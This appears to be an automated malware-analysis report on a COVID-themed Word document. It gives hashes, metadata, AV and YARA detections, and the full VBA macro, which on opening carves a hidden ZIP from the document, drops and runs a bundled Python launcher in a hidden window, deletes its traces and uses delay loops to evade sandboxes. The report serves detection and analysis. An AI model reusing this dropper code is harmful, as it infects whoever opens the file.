a703dc88...ba2d

Filters:

Filename	Category	Type	Severity	Actions

C:\Users\FD1HVy\Desktop\VPIyNbbmtoYiYfrB.doc

Sample File

Word Document

Malicious

Also Known As	C:\Users\Public\docer.doc (Dropped File)
Mime Type	application/msword
File Size	7.88 MB
MD5	ba1618a981f755eb752aa5dc90bd70a4
SHA1	a3b6e33901ffc15d15e2f3abae98c6da48727454
SHA256	a703dc8819dca1bc5774de3b6151c355606e7fe93c760b56bc09bcb6f928ba2d
SSDeep	196608:WEHZYtulHyQiaalIFVAa8oPe5Nxhq1gMqnDORSGa:vmtulHF7b4a8GeFhYqnea
ImpHash	-
Parser Error Remark	Static engine was unable to completely parse the analyzed file

Office Information

Creator	Jeremy
Last Modified By	Jeremy
Revision	251
Create Time	2019-11-11 06:20:00+00:00
Modify Time	2020-04-13 19:26:00+00:00

Document Information

Codepage	ANSI_Cyrillic
Application	Microsoft Office Word
App Version	16.0
Template	Normal.dotm
Company	SPecialiST RePack
Document Security	SECURITY_LOCKED
Editing Time	264540.0
Page Count	3
Line Count	39
Paragraph Count	11
Word Count	839
Character Count	4787
Chars With Spaces	5615
scale_crop	False
shared_doc	False

Controls (1)

CLSID	Control Name	Associated Vulnerability
{00020906-0000-0000-C000-000000000046}	Word97	-

VBA Macros (1)

Macro #1: ThisDocument


                   Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
    ActiveDocument.ActiveWindow.View.ReadingLayout = False
    ActiveDocument.Unprotect "securePass"
    show
    ActiveDocument.Protect wdAllowOnlyReading, True, "securePass", False, False
    
    Dim data As String
    Dim User As String
    Dim bla As String
    Dim Coper As Object
    User = "C:\Users\Public"

    Docer = ActiveDocument.FullName
    
    'Copy
    Call Shell("cmd /c copy " + Docer + " " + User + "\docer.doc", vbHide)
    deay (4)
    data = bin2var(User + "\docer.doc")
    data = Right(data, 7074638)
    var2bin User + "\smile.zip", data
    
    bla = VBA.FileSystem.Dir(User + "\Python37", vbDirectory)
    If bla <> VBA.Constants.vbNullString Then
        Call Shell("cmd /c rmdir /s /q " + User + "\Python37", vbHide)
        deay (2)
    End If
    'Unzip
    Unzip User + "\smile.zip", User, "Python37"
    'Clean
    Kill User + "\smile.zip"
    Kill User + "\docer.doc"
    'Run
    Call Shell("""" & User & "\Python37\python.exe" & """ """ & User & "\Python37\launcher.py" & """", vbHide)
End Sub

Function bin2var(filename As String) As String

'Which alters when it alteration finds,
'Or bends with the remover to remove.
    Dim f As Integer
    f = FreeFile()
    Open filename For Binary Access Read Lock Write As #f
        bin2var = Space(FileLen(filename))
        Get #f, , bin2var
    Close #f
'O no! it is an ever-fixed mark
'That looks on tempests and is never shaken;

End Function
'It is the star to every wand'ring bark,
'Whose worth 's unknown, although his height be taken.
'Love 's not Time's fool, though rosy lips and cheeks
'Within his bending sickle's compass come;

Sub var2bin(filename As String, data As String)

'If this be error and upon me prov'd,
'I never writ, nor no man ever lov'd.
    Dim f As Integer
    f = FreeFile()
    Open filename For Output Access Write Lock Write As #f
        Print #f, data;
    Close #f
End Sub
'Love alters not with his brief hours and weeks,
'But bears it out even to the edge of doom.

Sub Unzip(Fname As Variant, DefPath As String, TarFold As String)
    Dim oApp As Object
    Dim FileNameFolder As Variant

    'Root folder for the new folder.
    If Right(DefPath, 1) <> "\" Then
        DefPath = DefPath & "\"
    End If

    'Create the folder name
    strDate = Format(Now, " dd-mm-yy h-mm-ss")
    FileNameFolder = DefPath & TarFold & "\"

    'Make the normal folder in DefPath
    MkDir FileNameFolder

    'Extract the files into the newly created folder
    Set oApp = CreateObject("Shell.Application")
    oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, 4
End Sub


Sub hide()
    ActiveDocument.Sections(1).Range.Font.Hidden = False
    For Each Section In ActiveDocument.Sections
        If Section.Index > 1 Then Section.Range.Font.Hidden = True
    Next
End Sub

Sub show()
    ActiveDocument.Sections(1).Range.Font.Hidden = True
    For Each Section In ActiveDocument.Sections
        If Section.Index > 1 Then Section.Range.Font.Hidden = False
    Next
End Sub

Function deay(min)

  Dim ptr
  ptr = DateAdd("s", min, Time())
  If ptr > Time() Then
    Do Until (Time() > ptr)
    Loop
  End If

End Function

Document Content Snippet

W l "] ) ) ) ) ) ) ) ) g g ) ) ) ) ~g ) ) ) ) l ) ) ) ) ) ) ) ) ) \ m : C O V I D - 1 9 s Yb Yb i n d Yn a ...

Local AV Matches (1)

Threat Name	Severity
VB.EmoooDldr.2.Gen	Malicious

YARA Matches (2)

Rule Name	Rule Description	Classification	Score	Actions
VBA_Execution_Commands	VBA macro may execute files or system commands	-	3/5	... YARA Actions Show Ruleset Show Match
VBA_Time_Delay_Loops	VBA macro utilizes time delay loops; possible impact upon dynamic analysis	-	1/5	... YARA Actions Show Ruleset Show Match

C:\Users\Public\smile.zip

Dropped File

Unknown

Not Queried

Mime Type	-
File Size	0 Bytes
MD5	d41d8cd98f00b204e9800998ecf8427e
SHA1	da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256	e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep	3::
ImpHash	-

There are no files for this filter

There are no files in this analysis

WHOIS Domain Information

Before

After